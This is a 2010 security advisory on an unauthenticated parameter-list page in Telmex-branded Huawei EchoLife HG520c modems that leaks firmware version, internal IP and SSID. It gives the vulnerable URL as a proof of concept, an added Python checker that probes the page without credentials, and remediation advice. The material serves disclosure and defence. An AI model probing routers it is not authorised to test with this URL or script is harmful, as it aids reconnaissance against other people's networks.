Published: May 16, 2010

Huawei EchoLife HG520c Information Disclosure

Huawei EchoLife HG520c modems expose sensitive device information through an unauthenticated page of the web administration interface. Any client that can reach that interface can read it: hosts on the LAN by default, and Internet hosts when remote administration is enabled on the WAN side.

CVSS Score

5.3 / 10.0

Severity

Medium

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Advisory

Device: Huawei EchoLife HG520c
Firmware: 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0
Software: V100R001B021Telmex, V100R001B020Telmex
Location: Web administration interface (LAN/WAN)
Websec Advisory: WS10-11

Description

The page /Listadeparametros.html ("parameter list"; the affected builds are Telmex-branded Spanish-language firmware) returns the software version, the internal IP address, the wireless SSID and other modem configuration data. No authentication is required: the page is served to any client that can reach the web interface, before and independently of the administrator login. The exact firmware build and network details it leaks are directly useful for targeting further attacks against the device and the network behind it.

Exploit / Proof of Concept

From the LAN, using the modem's default gateway address (the page is reachable from the inside even when remote administration on the WAN is disabled):

http://192.168.1.254/Listadeparametros.html

If remote web administration is enabled on the WAN interface, the same page is reachable from the Internet over HTTPS:

https://<router-wan-ip>/Listadeparametros.html
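The following checker is an added example written for this page; it is not part of the original advisory or of any Websec or Huawei tooling. It requests /Listadeparametros.html with no credentials and classifies the answer, so the same function can confirm the disclosure on the LAN and, after remediation, confirm that the page is no longer served from the WAN. The URL path and the default LAN address 192.168.1.254 come from the advisory; the response markers used to tell "protected" from "disclosed" (HTTP 401 / WWW-Authenticate, a redirect to a login page, or a password field in the body) are assumptions about how a properly protected interface would answer, not documented behaviour of this firmware.

```python
"""Unauthenticated probe for the HG520c /Listadeparametros.html disclosure.

Added example, not code from the original advisory. The page path and the
default LAN address are taken from the advisory; the "protected" markers in
classify() are assumptions about a correctly protected interface.
"""
import re
import ssl
import sys
import urllib.error
import urllib.request

PAGE = "/Listadeparametros.html"
DEFAULT_LAN = "http://192.168.1.254"

# Assumption: a body that contains a password input is a login form, i.e.
# the interface asked for credentials instead of serving the parameter list.
LOGIN_FORM = re.compile(rb"<input[^>]+type=[\"']?password", re.I)


def classify(status, headers, body):
    """Classify one HTTP response as 'disclosed', 'protected' or 'unknown'.

    headers: dict mapping lower-cased header names to values.
    body:    raw response body (bytes).
    """
    if status == 401 or "www-authenticate" in headers:
        return "protected"           # device demanded credentials
    if status in (301, 302, 303, 307, 308):
        # A redirect to a login page is a protected interface; a redirect
        # anywhere else tells us nothing by itself.
        location = headers.get("location", "").lower()
        return "protected" if "login" in location else "unknown"
    if status != 200:
        return "unknown"
    if LOGIN_FORM.search(body):
        return "protected"
    # HTTP 200 with content and no credential prompt: the parameter list
    # was handed out without authentication.
    return "disclosed" if body.strip() else "unknown"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses as HTTPError instead of following them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url=DEFAULT_LAN, timeout=5):
    """GET PAGE from base_url with no credentials and classify the result.

    Certificate checks are disabled because the WAN-side interface is
    served over HTTPS with a vendor certificate that will not validate.
    Returns 'unreachable' when no HTTP answer is obtained at all.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    opener = urllib.request.build_opener(
        _NoRedirect(), urllib.request.HTTPSHandler(context=ctx))
    req = urllib.request.Request(base_url.rstrip("/") + PAGE,
                                 headers={"User-Agent": "hg520c-check"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            hdrs = {k.lower(): v for k, v in resp.getheaders()}
            return classify(resp.status, hdrs, resp.read())
    except urllib.error.HTTPError as err:
        hdrs = {k.lower(): v for k, v in err.headers.items()}
        return classify(err.code, hdrs, err.read())
    except (urllib.error.URLError, OSError):
        return "unreachable"


if __name__ == "__main__":
    # Usage: python hg520c_check.py [http://192.168.1.254 | https://<wan-ip>]
    target = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_LAN
    print(f"{target}{PAGE}: {probe(target)}")
```

Run it once against the LAN address to reproduce the finding, and once against the WAN address after disabling remote administration: anything other than "unreachable" or "protected" from the WAN side means the interface is still exposed.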

Remediation

Disable remote (WAN-side) web administration so the page is only reachable from the LAN, and apply a vendor firmware update if one becomes available. Disabling remote administration does not remove the unauthenticated page: any host on the LAN, including a compromised client or an unwanted wireless guest, can still read it until the firmware is fixed. After changing the setting, request the URL from the WAN side and confirm that the page is no longer served.
